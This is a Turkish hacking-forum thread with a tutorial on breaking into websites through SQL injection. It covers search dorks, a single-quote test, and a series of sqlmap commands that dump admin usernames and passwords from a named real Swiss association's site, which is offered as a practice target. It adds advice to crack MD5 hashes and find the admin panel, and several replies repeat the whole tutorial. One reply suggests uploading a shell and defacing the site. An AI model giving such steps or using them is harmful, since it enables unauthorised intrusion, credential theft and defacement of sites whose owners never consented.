SQL Açıklı Site Hacklemek

L3N1X

Üye
6 May 2023
201
89
Sanal Dünya

Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz

SQL AÇIĞINI BULMA :

Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine

staff.php,shop.php gibi şeylerde yazabilirsiniz Site Bulduk Diyelim Bu Sitede SQL Açık Olup Olmadığını Öğrenmek İçin www.website.com/index.php?id=1 url sinin sonundaki 1 in yanına ' Koyarak Öğrenebilirsiniz
tht.png

Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan

Deneyerek Kendinizi Geliştirebilirsiniz.

SİTENİN DATABASE SİNİ ÇEKME :

Evet Sitemizin Açığını Bulduğumuza Göre Artık Database sini Çekmeye Geldi Sıra Bunun İçin SQLMAP Aracını Kullanıcaz

Databasemizi Çekmek İçin Konsolumuza sqlmap -u https://web.site.com/index.php?id=1 --dbs Yazarak Taramayı Başlatıyoruz

Karışınıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz.

tht.png

DATABASE İÇİNE GİRME :

Taramamız Bittikten Sonra Karşımıza Database ler Gelecektir Bunların İçine Girmek İçin İse sqlmap -u https://web.site.com/index.php?id=1 -D database_adı --tables Komutunu Kullanıcaz

tht.png

Yine Aynı Şekilde Karşımıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz

İşlem Bittikten Sonra Bu Şekilde Gözükecektir ;

tht.png

TABLOLARIN İÇİNE GİRME :

Burdan Sitenin Admin Username Ve Password unu Bulmak İçin login,admin,user Gibi Tablolara Giricez Burdan samu_login Olduğu İçin

Ben Bu Tablonun içine Giricem Bunu Yapmak İçin İse ;

sqlmap -u https://web.site.com/index.php?id=1 -D samariter_1 -T samu_login --columns Yazarak Tablomuzun İçine Giriyoruz

Yine Sorulara Y Diyoruz


Son Hali Bu Şekilde Gözükecektir ;

tht.png

COLUMNS LARIN İÇİNE GİRME :

Evet Columns Larıda Çektiğimize Göre Sıra Kullanıcı Adını Ve Şifreyi Öğrenmeye Geldi Bazi Yerlerde Kullanıcı Adı Yerine ID ile Giriş Olabilir.

Birden Fazla Columns Açmak İçin İse login_id Yazdıktan Sonra , Koyup Passwort Yazmanız Yeterli Olacaktır Örnek Olarak Bu Şekilde ;

login_id,passwort

Bunların İçine Girmek İçin İse Şu Komutu Yazıyoruz ;

sqlmap -u Samariter Münsingen - index.php?id=2 -D samariter_1 -T samu_login -C login_id,passwort --dump

Çıkan Sorulara Y Diyip Enter lıyoruz

Son Hali Bu Şekilde Olacaktır ;

tht.png

MUTLU SON :)

Evet Bu Şekilde Admin Kullanıcı Adımızı Ve Şifresini Bulmuş Olduk

Devamında Admin Panelini Bulup Giriş Yapmakta Admin Panel Bulmak İçin İse Bu Konuya Bakınız !

Ve Ayrıca Havij Kullanarakta Bu İşlemleri Gerçekleştirebilirsiniz

Konumuz Bu Kadardı Beni Dinlediğiniz İçin Şimdiden Teşekkürler :D

NOT : ŞİFRELER GENELDE MD5 ŞİFRELEME TÜRÜYLE ŞİFRELENMİŞ OLUYOR BUNU KIRMAK İÇİN İSE MD5 CRACHER SİTELERİNİ KULLANABİLİRSİNİZ​

 
Son düzenleme:

L3N1X

Üye
6 May 2023
201
89
Sanal Dünya
Reis index basilirmi
Admin Panelini Bulup Giriş Yaparsan Basabilirsin ama Bu Siteye Atmanı Tavsiye Etmem Deneme Tahtamız Bu site Bizim :D

Tahtamiz ne demek
sql e yeni başlayanlar genelde bu tür eski sitelerde deniyor o yuzden önermem index atmayı

Hahaha hocam deneme tahtasına bikaç ekleme yapalım böyle fazla sade olmş :|
Yaparız hocam :)

ah bu site hiç şaşmaz :D
güzel Deneme Tahtasıdır Hocam :D
 

HaCkEr_33

Üye
30 Haz 2023
121
93
Azerbaycan

Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz

SQL AÇIĞINI BULMA :

Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine

staff.php,shop.php gibi şeylerde yazabilirsiniz Site Bulduk Diyelim Bu Sitede SQL Açık Olup Olmadığını Öğrenmek İçin www.website.com/index.php?id=1 url sinin sonundaki 1 in yanına ' Koyarak Öğrenebilirsiniz
tht.png

Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan

Deneyerek Kendinizi Geliştirebilirsiniz.

SİTENİN DATABASE SİNİ ÇEKME :

Evet Sitemizin Açığını Bulduğumuza Göre Artık Database sini Çekmeye Geldi Sıra Bunun İçin SQLMAP Aracını Kullanıcaz

Databasemizi Çekmek İçin Konsolumuza sqlmap -u https://web.site.com/index.php?id=1 --dbs Yazarak Taramayı Başlatıyoruz

Karışınıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz.

tht.png

DATABASE İÇİNE GİRME :

Taramamız Bittikten Sonra Karşımıza Database ler Gelecektir Bunların İçine Girmek İçin İse sqlmap -u https://web.site.com/index.php?id=1 -D database_adı --tables Komutunu Kullanıcaz

tht.png

Yine Aynı Şekilde Karşımıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz

İşlem Bittikten Sonra Bu Şekilde Gözükecektir ;

tht.png

TABLOLARIN İÇİNE GİRME :

Burdan Sitenin Admin Username Ve Password unu Bulmak İçin login,admin,user Gibi Tablolara Giricez Burdan samu_login Olduğu İçin

Ben Bu Tablonun içine Giricem Bunu Yapmak İçin İse ;

sqlmap -u https://web.site.com/index.php?id=1 -D samariter_1 -T samu_login --columns Yazarak Tablomuzun İçine Giriyoruz

Yine Sorulara Y Diyoruz


Son Hali Bu Şekilde Gözükecektir ;

tht.png

COLUMNS LARIN İÇİNE GİRME :

Evet Columns Larıda Çektiğimize Göre Sıra Kullanıcı Adını Ve Şifreyi Öğrenmeye Geldi Bazi Yerlerde Kullanıcı Adı Yerine ID ile Giriş Olabilir.

Birden Fazla Columns Açmak İçin İse login_id Yazdıktan Sonra , Koyup Passwort Yazmanız Yeterli Olacaktır Örnek Olarak Bu Şekilde ;

login_id,passwort

Bunların İçine Girmek İçin İse Şu Komutu Yazıyoruz ;

sqlmap -u Samariter Münsingen - index.php?id=2 -D samariter_1 -T samu_login -C login_id,passwort --dump

Çıkan Sorulara Y Diyip Enter lıyoruz

Son Hali Bu Şekilde Olacaktır ;

tht.png

MUTLU SON :)

Evet Bu Şekilde Admin Kullanıcı Adımızı Ve Şifresini Bulmuş Olduk

Devamında Admin Panelini Bulup Giriş Yapmakta Admin Panel Bulmak İçin İse Bu Konuya Bakınız !

Ve Ayrıca Havij Kullanarakta Bu İşlemleri Gerçekleştirebilirsiniz

Konumuz Bu Kadardı Beni Dinlediğiniz İçin Şimdiden Teşekkürler :D

NOT : ŞİFRELER GENELDE MD5 ŞİFRELEME TÜRÜYLE ŞİFRELENMİŞ OLUYOR BUNU KIRMAK İÇİN İSE MD5 CRACHER SİTELERİNİ KULLANABİLİRSİNİZ​

NOT: Unutmayinki herzaman sql hatasi olan her websitesinde sql acigi olmayabilir.

{ Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan }​

 

rootibo

Kıdemli Üye
13 Mar 2023
2,169
1,460

Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz

SQL AÇIĞINI BULMA :

Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine

staff.php,shop.php gibi şeylerde yazabilirsiniz Site Bulduk Diyelim Bu Sitede SQL Açık Olup Olmadığını Öğrenmek İçin www.website.com/index.php?id=1 url sinin sonundaki 1 in yanına ' Koyarak Öğrenebilirsiniz
tht.png

Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan

Deneyerek Kendinizi Geliştirebilirsiniz.

SİTENİN DATABASE SİNİ ÇEKME :

Evet Sitemizin Açığını Bulduğumuza Göre Artık Database sini Çekmeye Geldi Sıra Bunun İçin SQLMAP Aracını Kullanıcaz

Databasemizi Çekmek İçin Konsolumuza sqlmap -u https://web.site.com/index.php?id=1 --dbs Yazarak Taramayı Başlatıyoruz

Karışınıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz.

tht.png

DATABASE İÇİNE GİRME :

Taramamız Bittikten Sonra Karşımıza Database ler Gelecektir Bunların İçine Girmek İçin İse sqlmap -u https://web.site.com/index.php?id=1 -D database_adı --tables Komutunu Kullanıcaz

tht.png

Yine Aynı Şekilde Karşımıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz

İşlem Bittikten Sonra Bu Şekilde Gözükecektir ;

tht.png

TABLOLARIN İÇİNE GİRME :

Burdan Sitenin Admin Username Ve Password unu Bulmak İçin login,admin,user Gibi Tablolara Giricez Burdan samu_login Olduğu İçin

Ben Bu Tablonun içine Giricem Bunu Yapmak İçin İse ;

sqlmap -u https://web.site.com/index.php?id=1 -D samariter_1 -T samu_login --columns Yazarak Tablomuzun İçine Giriyoruz

Yine Sorulara Y Diyoruz


Son Hali Bu Şekilde Gözükecektir ;

tht.png

COLUMNS LARIN İÇİNE GİRME :

Evet Columns Larıda Çektiğimize Göre Sıra Kullanıcı Adını Ve Şifreyi Öğrenmeye Geldi Bazi Yerlerde Kullanıcı Adı Yerine ID ile Giriş Olabilir.

Birden Fazla Columns Açmak İçin İse login_id Yazdıktan Sonra , Koyup Passwort Yazmanız Yeterli Olacaktır Örnek Olarak Bu Şekilde ;

login_id,passwort

Bunların İçine Girmek İçin İse Şu Komutu Yazıyoruz ;

sqlmap -u Samariter Münsingen - index.php?id=2 -D samariter_1 -T samu_login -C login_id,passwort --dump

Çıkan Sorulara Y Diyip Enter lıyoruz

Son Hali Bu Şekilde Olacaktır ;

tht.png

MUTLU SON :)

Evet Bu Şekilde Admin Kullanıcı Adımızı Ve Şifresini Bulmuş Olduk

Devamında Admin Panelini Bulup Giriş Yapmakta Admin Panel Bulmak İçin İse Bu Konuya Bakınız !

Ve Ayrıca Havij Kullanarakta Bu İşlemleri Gerçekleştirebilirsiniz

Konumuz Bu Kadardı Beni Dinlediğiniz İçin Şimdiden Teşekkürler :D

NOT : ŞİFRELER GENELDE MD5 ŞİFRELEME TÜRÜYLE ŞİFRELENMİŞ OLUYOR BUNU KIRMAK İÇİN İSE MD5 CRACHER SİTELERİNİ KULLANABİLİRSİNİZ​

Eline Saglik Guzel Konu
 

Tdark

Katılımcı Üye
9 Ağu 2019
411
23
Anlatım için eline sağlık mesela örneksite.com sitesinde sql açığı bulmak istiyorum bunun için bir tool var mı
 

S3SS1Z T3AM

Uzman üye
27 Nis 2019
1,424
713
HACKERİSTAN
Keşke biraz daha detaylı araştırsanız okadar eksik var ki ...
Ayrıca sqli açığı varsa shell upload edip index basabilirsin.
Eline sağlık
 

Butcherb3y

Uzman üye
1 Eyl 2022
1,618
1,205
Anıtkabir

Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz

SQL AÇIĞINI BULMA :

Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine

staff.php,shop.php gibi şeylerde yazabilirsiniz Site Bulduk Diyelim Bu Sitede SQL Açık Olup Olmadığını Öğrenmek İçin www.website.com/index.php?id=1 url sinin sonundaki 1 in yanına ' Koyarak Öğrenebilirsiniz
tht.png

Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan

Deneyerek Kendinizi Geliştirebilirsiniz.

SİTENİN DATABASE SİNİ ÇEKME :

Evet Sitemizin Açığını Bulduğumuza Göre Artık Database sini Çekmeye Geldi Sıra Bunun İçin SQLMAP Aracını Kullanıcaz

Databasemizi Çekmek İçin Konsolumuza sqlmap -u https://web.site.com/index.php?id=1 --dbs Yazarak Taramayı Başlatıyoruz

Karışınıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz.

tht.png

DATABASE İÇİNE GİRME :

Taramamız Bittikten Sonra Karşımıza Database ler Gelecektir Bunların İçine Girmek İçin İse sqlmap -u https://web.site.com/index.php?id=1 -D database_adı --tables Komutunu Kullanıcaz

tht.png

Yine Aynı Şekilde Karşımıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz

İşlem Bittikten Sonra Bu Şekilde Gözükecektir ;

tht.png

TABLOLARIN İÇİNE GİRME :

Burdan Sitenin Admin Username Ve Password unu Bulmak İçin login,admin,user Gibi Tablolara Giricez Burdan samu_login Olduğu İçin

Ben Bu Tablonun içine Giricem Bunu Yapmak İçin İse ;

sqlmap -u https://web.site.com/index.php?id=1 -D samariter_1 -T samu_login --columns Yazarak Tablomuzun İçine Giriyoruz

Yine Sorulara Y Diyoruz


Son Hali Bu Şekilde Gözükecektir ;

tht.png

COLUMNS LARIN İÇİNE GİRME :

Evet Columns Larıda Çektiğimize Göre Sıra Kullanıcı Adını Ve Şifreyi Öğrenmeye Geldi Bazi Yerlerde Kullanıcı Adı Yerine ID ile Giriş Olabilir.

Birden Fazla Columns Açmak İçin İse login_id Yazdıktan Sonra , Koyup Passwort Yazmanız Yeterli Olacaktır Örnek Olarak Bu Şekilde ;

login_id,passwort

Bunların İçine Girmek İçin İse Şu Komutu Yazıyoruz ;

sqlmap -u Samariter Münsingen - index.php?id=2 -D samariter_1 -T samu_login -C login_id,passwort --dump

Çıkan Sorulara Y Diyip Enter lıyoruz

Son Hali Bu Şekilde Olacaktır ;

tht.png

MUTLU SON :)

Evet Bu Şekilde Admin Kullanıcı Adımızı Ve Şifresini Bulmuş Olduk

Devamında Admin Panelini Bulup Giriş Yapmakta Admin Panel Bulmak İçin İse Bu Konuya Bakınız !

Ve Ayrıca Havij Kullanarakta Bu İşlemleri Gerçekleştirebilirsiniz

Konumuz Bu Kadardı Beni Dinlediğiniz İçin Şimdiden Teşekkürler :D

NOT : ŞİFRELER GENELDE MD5 ŞİFRELEME TÜRÜYLE ŞİFRELENMİŞ OLUYOR BUNU KIRMAK İÇİN İSE MD5 CRACHER SİTELERİNİ KULLANABİLİRSİNİZ​

Konu güzel olmuş elinize sağlık
 

L3N1X

Üye
6 May 2023
201
89
Sanal Dünya
NOT: Unutmayinki herzaman sql hatasi olan her websitesinde sql acigi olmayabilir.

{ Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan }​

Bilgilendirme İçin Saolun Hocam
Eline Saglik Guzel Konu
saolun hocam
Anlatım için eline sağlık mesela örneksite.com sitesinde sql açığı bulmak istiyorum bunun için bir tool var mı
Merhaba Hocam Bu Konuya Bakabilirsiniz.

Konu güzel olmuş elinize sağlık
saolun hocam

Sqli "tek tırnak" değildir, sqli bundan varolmaz. Anlatım eksik.
bilgilendirme için saolun hocam
Keşke biraz daha detaylı araştırsanız okadar eksik var ki ...
Ayrıca sqli açığı varsa shell upload edip index basabilirsin.
Eline sağlık
Bilgilendirme İçin Saolun Hocam
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.